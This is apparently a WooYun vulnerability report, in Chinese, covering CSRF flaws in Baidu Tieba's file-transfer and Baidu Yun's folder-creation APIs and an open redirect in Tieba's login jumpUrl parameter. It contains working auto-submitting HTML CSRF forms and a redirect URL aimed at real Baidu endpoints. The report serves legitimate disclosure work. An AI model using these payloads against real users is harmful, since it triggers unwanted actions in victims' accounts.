WooYun.org

1.百度贴吧发一个文件帖子，其中转存文件功能没有加token,没有对来源验证，存在CSRF漏洞(注：转存功能要别人才能看见，自己看见的是前往云盘，所以要另一个号查看),如图

2.转存文件接口：http://tieba.baidu.com/data/filepost
访问以下页面,即可转存文件 (注;下面的参数是我截获我发的文件请求，不能修改，别的文件要另外发帖才行,另外转存功能对自己不会转存,但是别人访问就会转存)

<html>
<body>
<form id="csrf" name="csrf" action="http://tieba.baidu.com/data/filepost" method="POST">
<input type="text" name="dst_path" value="/client.txd" />
  <input type="text" name="method" value="archiveFile" />
  <input type="text" name="src_path" value="/apps/tieba/client.txd" />
 <input type="text" name="src_uk" value="1931405923" />
<input type="submit" value="submit" />
</form>
<script>
	document.csrf.submit();
</script>
</body>
</html>

3.在提交的参数中&src_uk=1931405923参数大概就是对应的文件号.如图

4.然后小号访问连接，就成功转存文件.如图

--------------------------------------------------------------------------------
1.百度云盘创建文件夹的功能,没有加token,没有对来源验证.存在CSRF漏洞
创建文件夹接口：http://yun.baidu.com/api/create
访问以下页面,即可创建文件夹

<html>
<body>
<form id="csrf" name="csrf" action="http://yun.baidu.com/api/create" method="POST">
  <input type="text" name="path" value="55555555555555555555555555555555555555555" />
<input type="text" name="isdir" value="1" />
<input type="text" name="size" value="1" />
<input type="text" name="block_list" value="[]" />
 <input type="text" name="method" value="post" />
</form>
<script>
	document.csrf.submit();
</script>
</body>
</html>

2.当小号访问之后，就创建了5555555..文件夹了，如图

------------------------------------------------------------------------------------
1.百度贴吧鸡肋的URL跳转，这个页面大概是最近新出的功能（第一次提交URL跳转漏洞不知道对不对）
URL跳转接口:http://tieba.baidu.com/f/user/passport?jumpUrl=http://www.qq.com/
(注：这个页面是百度贴吧登录接口，登录帐号之后才会跳转，鸡肋的地方就是不能用快速登录，要手动输入帐号密码登录)
如图:
(1)手动输入帐号密码登录贴吧，登录贴吧之后就会跳转到腾讯QQ官网

(2)登录之后跳转到腾讯QQ官网